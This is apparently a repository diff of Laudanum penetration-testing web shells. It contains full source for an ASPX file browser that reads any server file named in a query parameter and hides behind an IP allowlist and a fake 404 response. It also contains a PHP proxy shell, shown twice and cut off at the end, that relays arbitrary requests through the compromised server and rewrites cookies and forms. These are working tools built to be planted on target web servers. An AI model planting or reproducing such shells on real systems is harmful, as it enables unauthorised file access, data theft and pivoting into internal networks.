***
|
||||
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||
***
|
||||
********************************************************************************
|
||||
***
|
||||
*** This file allows browsing of the file system
|
||||
*** Written by James Jardine <james@secureideas.com>
|
||||
***
|
||||
********************************************************************************
|
||||
*** This program is free software; you can redistribute it and/or
|
||||
*** modify it under the terms of the GNU General Public License
|
||||
*** as published by the Free Software Foundation; either version 2
|
||||
*** of the License, or (at your option) any later version.
|
||||
***
|
||||
*** This program is distributed in the hope that it will be useful,
|
||||
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
*** GNU General Public License for more details.
|
||||
***
|
||||
*** You can get a copy of the GNU General Public License from this
|
||||
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||
********************************************************************************* */
|
||||
|
||||
// ********************* Config entries below ***********************************
|
||||
// IPs are enterable as individual addresses
|
||||
string[] allowedIPs = new string[3] {"::1", "192.168.1.1","127.0.0.1"};
|
||||
|
||||
// ***************** No editable content below this line **************************
|
||||
bool allowed = false;
|
||||
string dir = "";
|
||||
string file = "";
|
||||
|
||||
void Page_Load(object sender, System.EventArgs e)
|
||||
{
|
||||
|
||||
foreach (string ip in allowedIPs)
|
||||
{
|
||||
if (HttpContext.Current.Request.ServerVariables["REMOTE_ADDR"] == ip)
|
||||
{
|
||||
allowed = true;
|
||||
}
|
||||
}
|
||||
|
||||
if (!allowed)
|
||||
{
|
||||
die();
|
||||
}
|
||||
|
||||
//dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Environment.SystemDirectory;
|
||||
dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Server.MapPath(".");
|
||||
file = Request.QueryString["file"] != null ? Request.QueryString["file"] : "";
|
||||
|
||||
if (file.Length > 0)
|
||||
{
|
||||
if (System.IO.File.Exists(file))
|
||||
{
|
||||
writefile();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
void writefile()
|
||||
{
|
||||
Response.ClearContent();
|
||||
Response.Clear();
|
||||
Response.ContentType = "text/plain";
|
||||
//Uncomment the next line if you would prefer to download the file vs display it.
|
||||
//Response.AddHeader("Content-Disposition", "attachment; filename=" + file + ";");
|
||||
Response.TransmitFile(file);
|
||||
Response.Flush();
|
||||
Response.End();
|
||||
}
|
||||
|
||||
void die() {
|
||||
//HttpContext.Current.Response.Clear();
|
||||
HttpContext.Current.Response.StatusCode = 404;
|
||||
HttpContext.Current.Response.StatusDescription = "Not Found";
|
||||
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
|
||||
HttpContext.Current.Server.ClearError();
|
||||
HttpContext.Current.Response.End();
|
||||
}
|
||||
|
||||
|
||||
</script>
|
||||
<html>
|
||||
<head></head>
|
||||
<% string[] breadcrumbs = dir.Split('\\');
|
||||
string breadcrumb = "";
|
||||
foreach (string b in breadcrumbs)
|
||||
{
|
||||
if (b.Length > 0)
|
||||
{
|
||||
breadcrumb += b + "\\";
|
||||
Response.Write("<a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(breadcrumb) + "\">" + Server.HtmlEncode(b) + "</a>");
|
||||
Response.Write(" / ");
|
||||
}
|
||||
}
|
||||
%>
|
||||
<table>
|
||||
<tr><th>Name</th><th>Date</th><th>Size</th></tr>
|
||||
<%
|
||||
try
|
||||
{
|
||||
if (System.IO.Directory.Exists(dir))
|
||||
{
|
||||
string[] folders = System.IO.Directory.GetDirectories(dir);
|
||||
foreach (string folder in folders)
|
||||
{
|
||||
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(folder) + "\">" + Server.HtmlEncode(folder) + "</a></td><td></td><td></td></tr>");
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
Response.Write("This directory doesn't exist: " + Server.HtmlEncode(dir));
|
||||
Response.End();
|
||||
}
|
||||
|
||||
}
|
||||
catch (System.UnauthorizedAccessException ex)
|
||||
{
|
||||
Response.Write("You Don't Have Access to this directory: " + Server.HtmlEncode(dir));
|
||||
Response.End();
|
||||
}
|
||||
%>
|
||||
|
||||
<%
|
||||
System.IO.DirectoryInfo di = new System.IO.DirectoryInfo(dir);
|
||||
System.IO.FileInfo[] files = di.GetFiles();
|
||||
foreach (System.IO.FileInfo f in files)
|
||||
{
|
||||
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(dir) + "&file=" + Server.UrlEncode(f.FullName) + "\">" + Server.HtmlEncode(f.Name) + "</a></td><td>" + f.CreationTime.ToString() + "</td><td>" + f.Length.ToString() + "</td></tr>");
|
||||
}
|
||||
%>
|
||||
</table>
|
||||
</body>
|
||||
</html>
|
0
Web-Shells/laudanum-0.8/cfm/shell.cfm
Executable file → Normal file
0
Web-Shells/laudanum-0.8/cfm/shell.cfm
Executable file → Normal file
0
Web-Shells/laudanum-0.8/jsp/cmd.war
Executable file → Normal file
0
Web-Shells/laudanum-0.8/jsp/cmd.war
Executable file → Normal file
6
Web-Shells/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF
Executable file → Normal file
6
Web-Shells/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF
Executable file → Normal file
@ -1,3 +1,3 @@
|
||||
Manifest-Version: 1.0
|
||||
Created-By: 1.6.0_10 (Sun Microsystems Inc.)
|
||||
|
||||
Manifest-Version: 1.0
|
||||
Created-By: 1.6.0_10 (Sun Microsystems Inc.)
|
||||
|
||||
|
0
Web-Shells/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml
Executable file → Normal file
0
Web-Shells/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml
Executable file → Normal file
0
Web-Shells/laudanum-0.8/jsp/warfiles/cmd.jsp
Executable file → Normal file
0
Web-Shells/laudanum-0.8/jsp/warfiles/cmd.jsp
Executable file → Normal file
@ -1,351 +1,351 @@
|
||||
<?php
|
||||
ini_set('session.use_cookies', '0');
|
||||
/* *****************************************************************************
|
||||
***
|
||||
*** Laudanum Project
|
||||
*** A Collection of Injectable Files used during a Penetration Test
|
||||
***
|
||||
*** More information is available at:
|
||||
*** http://laudanum.secureideas.net
|
||||
*** laudanum@secureideas.net
|
||||
***
|
||||
*** Project Leads:
|
||||
*** Kevin Johnson <kjohnson@secureideas.net
|
||||
*** Tim Medin <tim@securitywhole.com>
|
||||
***
|
||||
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||
***
|
||||
********************************************************************************
|
||||
***
|
||||
*** This file allows browsing of the file system.
|
||||
*** Written by Tim Medin <tim@securitywhole.com>
|
||||
***
|
||||
********************************************************************************
|
||||
*** This program is free software; you can redistribute it and/or
|
||||
*** modify it under the terms of the GNU General Public License
|
||||
*** as published by the Free Software Foundation; either version 2
|
||||
*** of the License, or (at your option) any later version.
|
||||
***
|
||||
*** This program is distributed in the hope that it will be useful,
|
||||
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
*** GNU General Public License for more details.
|
||||
***
|
||||
*** You can get a copy of the GNU General Public License from this
|
||||
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||
***
|
||||
***************************************************************************** */
|
||||
|
||||
// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page
|
||||
// figure out how to reuse sessionid from the remote site
|
||||
|
||||
// ***************** Config entries below ***********************
|
||||
|
||||
// IPs are enterable as individual addresses TODO: add CIDR support
|
||||
$allowedIPs = array("19.168.2.16", "192.168.1.100","127.0.0.1","192.168.10.129","192.168.10.1");
|
||||
|
||||
# *********** No editable content below this line **************
|
||||
|
||||
$allowed = 0;
|
||||
foreach ($allowedIPs as $IP) {
|
||||
if ($_SERVER["REMOTE_ADDR"] == $IP)
|
||||
$allowed = 1;
|
||||
}
|
||||
|
||||
if ($allowed == 0) {
|
||||
header("HTTP/1.0 404 Not Found");
|
||||
die();
|
||||
}
|
||||
|
||||
/* This error handler will turn all notices, warnings, and errors into fatal
|
||||
* errors, unless they have been suppressed with the @-operator. */
|
||||
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
|
||||
/* The @-opertor (used with chdir() below) temporarely makes
|
||||
* error_reporting() return zero, and we don't want to die in that case.
|
||||
* We do note the error in the output, though. */
|
||||
if (error_reporting() == 0) {
|
||||
$_SESSION['output'] .= $errstr . "\n";
|
||||
} else {
|
||||
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||
"http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<title>Laudanum PHP Proxy</title>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Fatal Error!</h1>
|
||||
<p><b>' . $errstr . '</b></p>
|
||||
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
|
||||
|
||||
<hr>
|
||||
<address>
|
||||
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
|
||||
</body>
|
||||
</html>');
|
||||
}
|
||||
}
|
||||
|
||||
set_error_handler('error_handler');
|
||||
|
||||
function geturlarray($u) {
|
||||
// creates the url array, addes a scheme if it is missing and retries parsing
|
||||
$o = parse_url($u);
|
||||
if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); }
|
||||
if (!isset($o["path"])) { $o["path"] = "/"; }
|
||||
return $o;
|
||||
}
|
||||
|
||||
function buildurl ($u) {
|
||||
// build the url from the url array
|
||||
// this is used because the built in function isn't
|
||||
// avilable in all installs of php
|
||||
if (!isset($u["host"])) { return null; }
|
||||
|
||||
$s = isset($u["scheme"]) ? $u["scheme"] : "http";
|
||||
$s .= "://" . $u["host"];
|
||||
$s .= isset($u["port"]) ? ":" . $u["port"] : "";
|
||||
$s .= isset($u["path"]) ? $u["path"] : "/";
|
||||
$s .= isset($u["query"]) ? "?" . $u["query"] : "";
|
||||
$s .= isset($u["fragment"]) ? "#" . $u["fragment"] : "";
|
||||
return $s;
|
||||
}
|
||||
|
||||
function buildurlpath ($u) {
|
||||
//gets the full url and attempts to remove the file at the end of the url
|
||||
// e.g. http://blah.com/dir/file.ext => http://blah.com/dir/
|
||||
if (!isset($u["host"])) { return null; }
|
||||
|
||||
$s = isset($u["scheme"])? $u["scheme"] : "http";
|
||||
$s .= "://" . $u["host"];
|
||||
$s .= isset($u["port"]) ? ":" . $u["port"] : "";
|
||||
|
||||
$path = isset($u["path"]) ? $u["path"] : "/";
|
||||
// is the last portion of the path a file or a dir?
|
||||
// assume if there is a . it is a file
|
||||
// if it ends in a / then it is a dir
|
||||
// if neither, than assume dir
|
||||
$dirs = explode("/", $path);
|
||||
$last = $dirs[count($dirs) - 1];
|
||||
if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) {
|
||||
// its a file, remove the last chunk
|
||||
$path = substr($path, 0, -1 * strlen($last));
|
||||
}
|
||||
|
||||
$s .= $path;
|
||||
return $s;
|
||||
}
|
||||
|
||||
function getfilename ($u) {
|
||||
// returns the file name
|
||||
// e.g. http://blah.com/dir/file.ext returns file.ext
|
||||
// technically, it is the last portion of the url, so there is a potential
|
||||
// for a problem if a http://blah.com/dir returns a file
|
||||
$s = explode("/", $u["path"]);
|
||||
return $s[count($s) - 1];
|
||||
}
|
||||
|
||||
function getcontenttype ($headers) {
|
||||
// gets the content type
|
||||
foreach($headers as $h) {
|
||||
if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) {
|
||||
return $out[1][0];
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function getcontentencoding ($headers) {
|
||||
foreach ($headers as $h) {
|
||||
if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) {
|
||||
return $out[1][0];
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function removeheader($header, $headers) {
|
||||
foreach (array_keys($headers) as $key) {
|
||||
if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) {
|
||||
unset($headers[$key]);
|
||||
return $headers;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function rewritecookies($headers) {
|
||||
// removes the path and domain from cookies
|
||||
for ($i = 0; $i < count($headers); $i++) {
|
||||
if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) {
|
||||
$headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]);
|
||||
$headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]);
|
||||
}
|
||||
}
|
||||
return $headers;
|
||||
}
|
||||
|
||||
function getsessionid($headers) {
|
||||
for ($i = 0; $i < count($headers); $i++) {
|
||||
if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out))
|
||||
return $out[1][0];
|
||||
}
|
||||
return "0";
|
||||
}
|
||||
|
||||
function compatible_gzinflate($gzData) {
|
||||
if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) {
|
||||
$i = 10;
|
||||
$flg = ord( substr($gzData, 3, 1) );
|
||||
if ( $flg > 0 ) {
|
||||
if ( $flg & 4 ) {
|
||||
list($xlen) = unpack('v', substr($gzData, $i, 2) );
|
||||
$i = $i + 2 + $xlen;
|
||||
}
|
||||
if ( $flg & 8 )
|
||||
$i = strpos($gzData, "\0", $i) + 1;
|
||||
if ( $flg & 16 )
|
||||
$i = strpos($gzData, "\0", $i) + 1;
|
||||
if ( $flg & 2 )
|
||||
$i = $i + 2;
|
||||
}
|
||||
return @gzinflate( substr($gzData, $i, -8) );
|
||||
} else {
|
||||
return false;
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
function rewrite ($d, $u) {
|
||||
$r = $d;
|
||||
//rewrite images and links - absolute reference
|
||||
$r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r);
|
||||
//rewrite images and links - hard linked
|
||||
$r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r);
|
||||
//rewrite images and links - relative reference
|
||||
$r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r);
|
||||
|
||||
|
||||
//rewrite form - absolute reference
|
||||
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(\/[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . $u["scheme"] . "://" . $u["host"] . "\\3\">", $r);
|
||||
//rewrite form - hard linked
|
||||
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(http[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . "\\3\">", $r);
|
||||
//rewrite form - relative reference
|
||||
$r = preg_replace("/(<form(.+?)action.?=.?['\"])([^\/][^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . buildurlpath($u) . "\\3\">", $r);
|
||||
return $r;
|
||||
}
|
||||
|
||||
/* Initialize some variables we need again and again. */
|
||||
$url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : "";
|
||||
if ($url == "") {
|
||||
$url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : "";
|
||||
}
|
||||
|
||||
if ($url == "") {
|
||||
?>
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||
"http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<title>Laudanum PHP Proxy</title>
|
||||
<link rel="stylesheet" href="style.css" type="text/css">
|
||||
|
||||
<script type="text/javascript">
|
||||
function init() {
|
||||
document.proxy.url.focus();
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body onload="init()">
|
||||
|
||||
<h1>Laudanum PHP Proxy</h1>
|
||||
|
||||
<form method="GET" name="proxy">
|
||||
<input type="text" name="laudurl" size="70">
|
||||
|
||||
</form>
|
||||
<hr>
|
||||
<address>
|
||||
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<?php
|
||||
} else {
|
||||
|
||||
$url_c = geturlarray($url);
|
||||
$params = array_merge($_GET, $_POST);
|
||||
|
||||
//don't pass throught the parameter we are using
|
||||
unset($params["laudurl"]);
|
||||
|
||||
//create the query or post parameters
|
||||
$query = http_build_query($params);
|
||||
if ($query != "") {
|
||||
$url_c["query"] = $query;
|
||||
}
|
||||
|
||||
//get the files
|
||||
$fp = fopen(buildurl($url_c), "rb");
|
||||
|
||||
// use the headers, except the response code which is popped off the array
|
||||
$headers = $http_response_header;
|
||||
// pop
|
||||
array_shift($headers);
|
||||
|
||||
// fix cookies
|
||||
$headers = rewritecookies($headers);
|
||||
|
||||
$ctype = getcontenttype($headers);
|
||||
$cencoding = getcontentencoding($headers);
|
||||
|
||||
// we will remove gzip encoding later, but we need to remove the header now
|
||||
// before it is added to the response.
|
||||
if ($cencoding == "gzip")
|
||||
$headers = removeheader("Content-Encoding", $headers);
|
||||
|
||||
// set headers for response to client
|
||||
if (preg_match("/text|image/", $ctype)) {
|
||||
header_remove();
|
||||
// the number of headers can change due to replacement
|
||||
$i = 0;
|
||||
while ($i < count($headers)) {
|
||||
if (strpos($headers[$i], "Set-Cookie:") == false)
|
||||
// replace headers
|
||||
header($headers[$i], true);
|
||||
else
|
||||
// if it is the first cookie, replace all the others. Otherwise add
|
||||
header($headers[$i], false);
|
||||
$i++;
|
||||
}
|
||||
} else {
|
||||
header("Content-Disposition: attachment; filename=" . getfilename($url_c));
|
||||
}
|
||||
|
||||
// get data
|
||||
if (preg_match("/text/",$ctype)) { //text
|
||||
//it is a text format: html, css, js
|
||||
$data = "";
|
||||
while (!feof($fp)) {
|
||||
$data .= fgets($fp, 4096);
|
||||
}
|
||||
|
||||
// uncompress it so it can be rewritten
|
||||
if ($cencoding == "gzip")
|
||||
$data = compatible_gzinflate($data);
|
||||
|
||||
// rewrite all the links and such
|
||||
echo rewrite($data, $url_c);
|
||||
|
||||
} else {
|
||||
// binary format or something similar, let it go through
|
||||
fpassthru($fp);
|
||||
fclose($fp);
|
||||
}
|
||||
}
|
||||
?>
|
||||
<?php
|
||||
ini_set('session.use_cookies', '0');
|
||||
/* *****************************************************************************
|
||||
***
|
||||
*** Laudanum Project
|
||||
*** A Collection of Injectable Files used during a Penetration Test
|
||||
***
|
||||
*** More information is available at:
|
||||
*** http://laudanum.secureideas.net
|
||||
*** laudanum@secureideas.net
|
||||
***
|
||||
*** Project Leads:
|
||||
*** Kevin Johnson <kjohnson@secureideas.net
|
||||
*** Tim Medin <tim@securitywhole.com>
|
||||
***
|
||||
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||
***
|
||||
********************************************************************************
|
||||
***
|
||||
*** This file allows browsing of the file system.
|
||||
*** Written by Tim Medin <tim@securitywhole.com>
|
||||
***
|
||||
********************************************************************************
|
||||
*** This program is free software; you can redistribute it and/or
|
||||
*** modify it under the terms of the GNU General Public License
|
||||
*** as published by the Free Software Foundation; either version 2
|
||||
*** of the License, or (at your option) any later version.
|
||||
***
|
||||
*** This program is distributed in the hope that it will be useful,
|
||||
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
*** GNU General Public License for more details.
|
||||
***
|
||||
*** You can get a copy of the GNU General Public License from this
|
||||
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||
***
|
||||
***************************************************************************** */
|
||||
|
||||
// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page
|
||||
// figure out how to reuse sessionid from the remote site
|
||||
|
||||
// ***************** Config entries below ***********************
|
||||
|
||||
// IPs are enterable as individual addresses TODO: add CIDR support
|
||||
$allowedIPs = array("19.168.2.16", "192.168.1.100","127.0.0.1","192.168.10.129","192.168.10.1");
|
||||
|
||||
# *********** No editable content below this line **************
|
||||
|
||||
$allowed = 0;
|
||||
foreach ($allowedIPs as $IP) {
|
||||
if ($_SERVER["REMOTE_ADDR"] == $IP)
|
||||
$allowed = 1;
|
||||
}
|
||||
|
||||
if ($allowed == 0) {
|
||||
header("HTTP/1.0 404 Not Found");
|
||||
die();
|
||||
}
|
||||
|
||||
/* This error handler will turn all notices, warnings, and errors into fatal
|
||||
* errors, unless they have been suppressed with the @-operator. */
|
||||
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
|
||||
/* The @-opertor (used with chdir() below) temporarely makes
|
||||
* error_reporting() return zero, and we don't want to die in that case.
|
||||
* We do note the error in the output, though. */
|
||||
if (error_reporting() == 0) {
|
||||
$_SESSION['output'] .= $errstr . "\n";
|
||||
} else {
|
||||
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||
"http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<title>Laudanum PHP Proxy</title>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Fatal Error!</h1>
|
||||
<p><b>' . $errstr . '</b></p>
|
||||
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
|
||||
|
||||
<hr>
|
||||
<address>
|
||||
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
|
||||
</body>
|
||||
</html>');
|
||||
}
|
||||
}
|
||||
|
||||
set_error_handler('error_handler');
|
||||
|
||||
function geturlarray($u) {
|
||||
// creates the url array, addes a scheme if it is missing and retries parsing
|
||||
$o = parse_url($u);
|
||||
if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); }
|
||||
if (!isset($o["path"])) { $o["path"] = "/"; }
|
||||
return $o;
|
||||
}
|
||||
|
||||
function buildurl ($u) {
|
||||
// build the url from the url array
|
||||
// this is used because the built in function isn't
|
||||
// avilable in all installs of php
|
||||
if (!isset($u["host"])) { return null; }
|
||||
|
||||
$s = isset($u["scheme"]) ? $u["scheme"] : "http";
|
||||
$s .= "://" . $u["host"];
|
||||
$s .= isset($u["port"]) ? ":" . $u["port"] : "";
|
||||
$s .= isset($u["path"]) ? $u["path"] : "/";
|
||||
$s .= isset($u["query"]) ? "?" . $u["query"] : "";
|
||||
$s .= isset($u["fragment"]) ? "#" . $u["fragment"] : "";
|
||||
return $s;
|
||||
}
|
||||
|
||||
function buildurlpath ($u) {
|
||||
//gets the full url and attempts to remove the file at the end of the url
|
||||
// e.g. http://blah.com/dir/file.ext => http://blah.com/dir/
|
||||
if (!isset($u["host"])) { return null; }
|
||||
|
||||
$s = isset($u["scheme"])? $u["scheme"] : "http";
|
||||
$s .= "://" . $u["host"];
|
||||
$s .= isset($u["port"]) ? ":" . $u["port"] : "";
|
||||
|
||||
$path = isset($u["path"]) ? $u["path"] : "/";
|
||||
// is the last portion of the path a file or a dir?
|
||||
// assume if there is a . it is a file
|
||||
// if it ends in a / then it is a dir
|
||||
// if neither, than assume dir
|
||||
$dirs = explode("/", $path);
|
||||
$last = $dirs[count($dirs) - 1];
|
||||
if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) {
|
||||
// its a file, remove the last chunk
|
||||
$path = substr($path, 0, -1 * strlen($last));
|
||||
}
|
||||
|
||||
$s .= $path;
|
||||
return $s;
|
||||
}
|
||||
|
||||
function getfilename ($u) {
|
||||
// returns the file name
|
||||
// e.g. http://blah.com/dir/file.ext returns file.ext
|
||||
// technically, it is the last portion of the url, so there is a potential
|
||||
// for a problem if a http://blah.com/dir returns a file
|
||||
$s = explode("/", $u["path"]);
|
||||
return $s[count($s) - 1];
|
||||
}
|
||||
|
||||
function getcontenttype ($headers) {
|
||||
// gets the content type
|
||||
foreach($headers as $h) {
|
||||
if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) {
|
||||
return $out[1][0];
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function getcontentencoding ($headers) {
|
||||
foreach ($headers as $h) {
|
||||
if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) {
|
||||
return $out[1][0];
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function removeheader($header, $headers) {
|
||||
foreach (array_keys($headers) as $key) {
|
||||
if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) {
|
||||
unset($headers[$key]);
|
||||
return $headers;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function rewritecookies($headers) {
|
||||
// removes the path and domain from cookies
|
||||
for ($i = 0; $i < count($headers); $i++) {
|
||||
if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) {
|
||||
$headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]);
|
||||
$headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]);
|
||||
}
|
||||
}
|
||||
return $headers;
|
||||
}
|
||||
|
||||
function getsessionid($headers) {
|
||||
for ($i = 0; $i < count($headers); $i++) {
|
||||
if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out))
|
||||
return $out[1][0];
|
||||
}
|
||||
return "0";
|
||||
}
|
||||
|
||||
function compatible_gzinflate($gzData) {
|
||||
if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) {
|
||||
$i = 10;
|
||||
$flg = ord( substr($gzData, 3, 1) );
|
||||
if ( $flg > 0 ) {
|
||||
if ( $flg & 4 ) {
|
||||
list($xlen) = unpack('v', substr($gzData, $i, 2) );
|
||||
$i = $i + 2 + $xlen;
|
||||
}
|
||||
if ( $flg & 8 )
|
||||
$i = strpos($gzData, "\0", $i) + 1;
|
||||
if ( $flg & 16 )
|
||||
$i = strpos($gzData, "\0", $i) + 1;
|
||||
if ( $flg & 2 )
|
||||
$i = $i + 2;
|
||||
}
|
||||
return @gzinflate( substr($gzData, $i, -8) );
|
||||
} else {
|
||||
return false;
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
function rewrite ($d, $u) {
|
||||
$r = $d;
|
||||
//rewrite images and links - absolute reference
|
||||
$r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r);
|
||||
//rewrite images and links - hard linked
|
||||
$r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r);
|
||||
//rewrite images and links - relative reference
|
||||
$r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r);
|
||||
|
||||
|
||||
//rewrite form - absolute reference
|
||||
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(\/[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . $u["scheme"] . "://" . $u["host"] . "\\3\">", $r);
|
||||
//rewrite form - hard linked
|
||||
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(http[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . "\\3\">", $r);
|
||||
//rewrite form - relative reference
|
||||
$r = preg_replace("/(<form(.+?)action.?=.?['\"])([^\/][^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . buildurlpath($u) . "\\3\">", $r);
|
||||
return $r;
|
||||
}
|
||||
|
||||
/* Initialize some variables we need again and again. */
|
||||
$url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : "";
|
||||
if ($url == "") {
|
||||
$url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : "";
|
||||
}
|
||||
|
||||
if ($url == "") {
|
||||
?>
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||
"http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<title>Laudanum PHP Proxy</title>
|
||||
<link rel="stylesheet" href="style.css" type="text/css">
|
||||
|
||||
<script type="text/javascript">
|
||||
function init() {
|
||||
document.proxy.url.focus();
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body onload="init()">
|
||||
|
||||
